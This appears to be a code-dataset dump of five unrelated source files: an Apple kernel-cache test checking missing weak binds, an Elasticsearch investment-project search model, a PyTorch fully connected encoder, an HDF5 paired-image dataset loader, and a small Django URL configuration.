ZZZ_OtherDemo/00-dyld-832.7.3/testing/kernel-cache-tests/kext-missing-weak-bind/test.py | 1079278593/TreasureChest | 0 | 16995 | <reponame>1079278593/TreasureChest
#!/usr/bin/python2.7
import os
import KernelCollection
# Check that weak binds can be missing, so long as we check for the magic symbol
def check(kernel_cache):
kernel_cache.buildKernelCollection("arm64", "/kext-missing-weak-bind/main.kc", "/kext-missing-weak-bind/main.kernel", "/kext-missing-weak-bind/extensions", ["com.apple.foo", "com.apple.bar"], [])
kernel_cache.analyze("/kext-missing-weak-bind/main.kc", ["-layout", "-arch", "arm64"])
assert kernel_cache.dictionary()["cache-segments"][3]["name"] == "__DATA_CONST"
assert kernel_cache.dictionary()["cache-segments"][3]["vmAddr"] == "0x18000"
assert len(kernel_cache.dictionary()["dylibs"]) == 3
assert kernel_cache.dictionary()["dylibs"][0]["name"] == "com.apple.kernel"
assert kernel_cache.dictionary()["dylibs"][1]["name"] == "com.apple.bar"
assert kernel_cache.dictionary()["dylibs"][2]["name"] == "com.apple.foo"
# Symbols
kernel_cache.analyze("/kext-missing-weak-bind/main.kc", ["-symbols", "-arch", "arm64"])
# kernel
assert kernel_cache.dictionary()["dylibs"][0]["name"] == "com.apple.kernel"
assert kernel_cache.dictionary()["dylibs"][0]["global-symbols"][2]["name"] == "_gOSKextUnresolved"
assert kernel_cache.dictionary()["dylibs"][0]["global-symbols"][2]["vmAddr"] == "0x20000"
# Check the fixups
kernel_cache.analyze("/kext-missing-weak-bind/main.kc", ["-fixups", "-arch", "arm64"])
assert len(kernel_cache.dictionary()["fixups"]) == 4
assert kernel_cache.dictionary()["fixups"]["0x18000"] == "kc(0) + 0x20000"
assert kernel_cache.dictionary()["fixups"]["0x18008"] == "kc(0) + 0x20000"
assert kernel_cache.dictionary()["fixups"]["0x18010"] == "kc(0) + 0x20000"
assert kernel_cache.dictionary()["fixups"]["0x18018"] == "kc(0) + 0x20000"
assert len(kernel_cache.dictionary()["dylibs"]) == 3
assert kernel_cache.dictionary()["dylibs"][0]["name"] == "com.apple.kernel"
assert kernel_cache.dictionary()["dylibs"][0]["fixups"] == "none"
assert kernel_cache.dictionary()["dylibs"][1]["name"] == "com.apple.bar"
assert kernel_cache.dictionary()["dylibs"][1]["fixups"] == "none"
assert kernel_cache.dictionary()["dylibs"][2]["name"] == "com.apple.foo"
assert kernel_cache.dictionary()["dylibs"][2]["fixups"] == "none"
# [~]> xcrun -sdk iphoneos.internal cc -arch arm64 -Wl,-static -mkernel -nostdlib -Wl,-add_split_seg_info -Wl,-rename_section,__TEXT,__text,__TEXT_EXEC,__text -Wl,-e,__start -Wl,-pagezero_size,0x0 -Wl,-pie -Wl,-sectcreate,__LINKINFO,__symbolsets,SymbolSets.plist -Wl,-segprot,__LINKINFO,r--,r-- main.c -o main.kernel
# [~]> xcrun -sdk iphoneos.internal cc -arch arm64 -Wl,-kext -mkernel -nostdlib -Wl,-add_split_seg_info foo.c -o extensions/foo.kext/foo
# [~]> xcrun -sdk iphoneos.internal cc -arch arm64 -Wl,-kext -mkernel -nostdlib -Wl,-add_split_seg_info bar.c -o extensions/bar.kext/bar -Wl,-fixup_chains
# [~]> rm -r extensions/*.kext/*.ld
| 2.234375 | 2 |
datahub/search/investment/models.py | alixedi/data-hub-api-cd-poc | 0 | 16996 | <reponame>alixedi/data-hub-api-cd-poc
from elasticsearch_dsl import Boolean, Date, Double, Integer, Keyword, Long, Object, Text
from datahub.search import dict_utils
from datahub.search import fields
from datahub.search.models import BaseESModel
DOC_TYPE = 'investment_project'
def _related_investment_project_field():
"""Field for a related investment project."""
return Object(properties={
'id': Keyword(),
'name': fields.NormalizedKeyword(),
'project_code': fields.NormalizedKeyword(),
})
class InvestmentProject(BaseESModel):
"""Elasticsearch representation of InvestmentProject."""
id = Keyword()
actual_land_date = Date()
actual_uk_regions = fields.id_name_field()
address_1 = Text()
address_2 = Text()
address_town = fields.NormalizedKeyword()
address_postcode = Text()
approved_commitment_to_invest = Boolean()
approved_fdi = Boolean()
approved_good_value = Boolean()
approved_high_value = Boolean()
approved_landed = Boolean()
approved_non_fdi = Boolean()
allow_blank_estimated_land_date = Boolean(index=False)
allow_blank_possible_uk_regions = Boolean(index=False)
anonymous_description = fields.EnglishText()
archived = Boolean()
archived_by = fields.contact_or_adviser_field()
archived_on = Date()
archived_reason = Text()
associated_non_fdi_r_and_d_project = _related_investment_project_field()
average_salary = fields.id_name_field()
business_activities = fields.id_name_field()
client_cannot_provide_foreign_investment = Boolean()
client_cannot_provide_total_investment = Boolean()
client_contacts = fields.contact_or_adviser_field()
client_relationship_manager = fields.contact_or_adviser_field(include_dit_team=True)
client_requirements = Text(index=False)
comments = fields.EnglishText()
country_investment_originates_from = fields.id_name_field()
country_lost_to = Object(
properties={
'id': Keyword(index=False),
'name': Text(index=False),
},
)
created_on = Date()
created_by = fields.contact_or_adviser_field(include_dit_team=True)
date_abandoned = Date()
date_lost = Date()
delivery_partners = fields.id_name_field()
description = fields.EnglishText()
estimated_land_date = Date()
export_revenue = Boolean()
fdi_type = fields.id_name_field()
fdi_value = fields.id_name_field()
foreign_equity_investment = Double()
government_assistance = Boolean()
intermediate_company = fields.id_name_field()
investor_company = fields.id_name_partial_field()
investor_company_country = fields.id_name_field()
investment_type = fields.id_name_field()
investor_type = fields.id_name_field()
level_of_involvement = fields.id_name_field()
likelihood_to_land = fields.id_name_field()
project_assurance_adviser = fields.contact_or_adviser_field(include_dit_team=True)
project_manager = fields.contact_or_adviser_field(include_dit_team=True)
name = Text(
fields={
'keyword': fields.NormalizedKeyword(),
'trigram': fields.TrigramText(),
},
)
new_tech_to_uk = Boolean()
non_fdi_r_and_d_budget = Boolean()
number_new_jobs = Integer()
number_safeguarded_jobs = Long()
modified_on = Date()
project_arrived_in_triage_on = Date()
project_code = fields.NormalizedKeyword(
fields={
'trigram': fields.TrigramText(),
},
)
proposal_deadline = Date()
other_business_activity = Text(index=False)
quotable_as_public_case_study = Boolean()
r_and_d_budget = Boolean()
reason_abandoned = Text(index=False)
reason_delayed = Text(index=False)
reason_lost = Text(index=False)
referral_source_activity = fields.id_name_field()
referral_source_activity_event = fields.NormalizedKeyword()
referral_source_activity_marketing = fields.id_name_field()
referral_source_activity_website = fields.id_name_field()
referral_source_adviser = Object(
properties={
'id': Keyword(index=False),
'first_name': Text(index=False),
'last_name': Text(index=False),
'name': Text(index=False),
},
)
sector = fields.sector_field()
site_decided = Boolean()
some_new_jobs = Boolean()
specific_programme = fields.id_name_field()
stage = fields.id_name_field()
status = fields.NormalizedKeyword()
team_members = fields.contact_or_adviser_field(include_dit_team=True)
total_investment = Double()
uk_company = fields.id_name_partial_field()
uk_company_decided = Boolean()
uk_region_locations = fields.id_name_field()
will_new_jobs_last_two_years = Boolean()
level_of_involvement_simplified = Keyword()
gross_value_added = Double()
MAPPINGS = {
'actual_uk_regions': lambda col: [
dict_utils.id_name_dict(c) for c in col.all()
],
'archived_by': dict_utils.contact_or_adviser_dict,
'associated_non_fdi_r_and_d_project': dict_utils.investment_project_dict,
'average_salary': dict_utils.id_name_dict,
'business_activities': lambda col: [dict_utils.id_name_dict(c) for c in col.all()],
'client_contacts': lambda col: [dict_utils.contact_or_adviser_dict(c) for c in col.all()],
'client_relationship_manager': dict_utils.adviser_dict_with_team,
'country_lost_to': dict_utils.id_name_dict,
'country_investment_originates_from': dict_utils.id_name_dict,
'created_by': dict_utils.adviser_dict_with_team,
'delivery_partners': lambda col: [
dict_utils.id_name_dict(c) for c in col.all()
],
'fdi_type': dict_utils.id_name_dict,
'fdi_value': dict_utils.id_name_dict,
'intermediate_company': dict_utils.id_name_dict,
'investment_type': dict_utils.id_name_dict,
'investor_company': dict_utils.id_name_dict,
'investor_company_country': dict_utils.id_name_dict,
'investor_type': dict_utils.id_name_dict,
'level_of_involvement': dict_utils.id_name_dict,
'likelihood_to_land': dict_utils.id_name_dict,
'project_assurance_adviser': dict_utils.adviser_dict_with_team,
'project_code': str,
'project_manager': dict_utils.adviser_dict_with_team,
'referral_source_activity': dict_utils.id_name_dict,
'referral_source_activity_marketing': dict_utils.id_name_dict,
'referral_source_activity_website': dict_utils.id_name_dict,
'referral_source_adviser': dict_utils.contact_or_adviser_dict,
'sector': dict_utils.sector_dict,
'specific_programme': dict_utils.id_name_dict,
'stage': dict_utils.id_name_dict,
'team_members': lambda col: [
dict_utils.contact_or_adviser_dict(c.adviser, include_dit_team=True) for c in col.all()
],
'uk_company': dict_utils.id_name_dict,
'uk_region_locations': lambda col: [
dict_utils.id_name_dict(c) for c in col.all()
],
}
SEARCH_FIELDS = (
'id',
'name',
'name.trigram',
'uk_company.name',
'uk_company.name.trigram',
'investor_company.name',
'investor_company.name.trigram',
'project_code.trigram',
)
class Meta:
"""Default document meta data."""
doc_type = DOC_TYPE
class Index:
doc_type = DOC_TYPE
| 2.34375 | 2 |
robust_sleep_net/models/modulo_net/features_encoder/fully_connected.py | Dreem-Organization/RobustSleepNet | 16 | 16997 | <reponame>Dreem-Organization/RobustSleepNet
from collections import OrderedDict
import torch
from torch import nn
class FullyConnected(nn.Module):
def __init__(self, features, layers=None, dropout=0.0):
super(FullyConnected, self).__init__()
print("Layers:", layers)
input_channels = 0
for feature in features:
input_channels += features[feature]["shape"][0]
self.dropout = nn.Dropout(dropout)
if isinstance(layers, list):
self.layers = nn.ModuleList(
[
nn.Sequential(
OrderedDict(
[
(
"linear_{}".format(i),
nn.Linear(
in_features=input_channels if i == 0 else layers[i - 1],
out_features=n_dim,
),
),
("relu_{}".format(i), nn.ReLU()),
]
)
)
for i, n_dim in enumerate(layers)
]
)
self.out_features = layers[-1]
elif layers is None:
self.layers = [nn.Identity()]
self.out_features = input_channels
def forward(self, x):
features = []
for feature in x:
features += [x[feature]]
features = torch.cat(features, -1)
for layer in self.layers:
features = self.dropout(features)
features = layer(features)
return features
| 2.546875 | 3 |
data/rawdata_dataset.py | weiyw16/pytorch-CycleGAN-and-pix2pix | 0 | 16998 | #import
import os
#import torch
#import torch.nn as nn
import torch.utils.data as Data
#import torchvision
import matplotlib.pyplot as plt
import h5py
#from torch.autograd import Variable
import numpy as np
import torch
class rawdataDataset(Data.Dataset):
def __init__(self):
super(rawdataDataset, self).__init__()
#def __init__(self, filename, root_dir, transform=None):
# self.frame = h5py.File(root_dir + filename, 'r')
# self.root_dir = root_dir
# self.transform = transform
def name(self):
return 'rawdataDataset'
@staticmethod
def modify_commandline_options(parser, is_train):
return parser
def initialize(self, opt):
self.opt = opt
self.root = opt.dataroot
self.dir_AB = os.path.join(opt.dataroot, opt.phase) # phase: train test
#self.AB_paths = sorted(make_dataset(self.dir_AB))
self.A_paths = self.dir_AB + "/A.h5"
self.B_paths = self.dir_AB + "/B.h5"
self.frameA = h5py.File(self.A_paths, 'r')
self.frameB = h5py.File(self.B_paths, 'r')
#assert(opt.resize_or_crop == 'resize_and_crop')
def __len__(self):
return len(self.frameA)
def __getitem__(self, index):
#img_name = torch.FloatTensor([[ self.frame["pic" + str(index)] ]])
#img_name = Variable(torch.FloatTensor([[ self.frame["pic" + str(index)] ]])
A = self.frameA["A" + str(index + 1)]
B = self.frameB["B" + str(index + 1)]
#A = torch.FloatTensor([[ self.frameA["A" + str(index)] ]])
#B = torch.FloatTensor([[ self.frameB["B" + str(index)] ]])
#AB_path = self.AB_paths[index]
#AB = Image.open(AB_path).convert('RGB')
#w, h = AB.size
#w2 = int(w / 2)
#A = AB.crop((0, 0, w2, h)).resize((self.opt.loadSize, self.opt.loadSize), Image.BICUBIC)
#B = AB.crop((w2, 0, w, h)).resize((self.opt.loadSize, self.opt.loadSize), Image.BICUBIC)
#A = transforms.ToTensor()(A)
#B = transforms.ToTensor()(B)
#w_offset = random.randint(0, max(0, self.opt.loadSize - self.opt.fineSize - 1))
#h_offset = random.randint(0, max(0, self.opt.loadSize - self.opt.fineSize - 1))
#A = A[:, h_offset:h_offset + self.opt.fineSize, w_offset:w_offset + self.opt.fineSize]
#B = B[:, h_offset:h_offset + self.opt.fineSize, w_offset:w_offset + self.opt.fineSize]
#A = transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))(A)
#B = transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))(B)
if self.opt.which_direction == 'BtoA':
input_nc = self.opt.output_nc
output_nc = self.opt.input_nc
else:
input_nc = self.opt.input_nc
output_nc = self.opt.output_nc
#return img_name
return {'A' : A, 'B' : B, 'A_paths' : self.A_paths, 'B_paths' : self.B_paths}
#%hist -f rawdata_dataset.py
| 2.21875 | 2 |
pythons/pythons/pythons_app/urls.py | BoyanPeychinov/python_web_framework | 0 | 16999 | from django.urls import path
from . import views
from .views import IndexView
urlpatterns = [
# path('', views.index, name="index"),
path('', IndexView.as_view(), name="index"),
# path('create/', views.create, name="create"),
path('create/', views.PythonCreateView.as_view(), name="create"),
] | 1.914063 | 2 |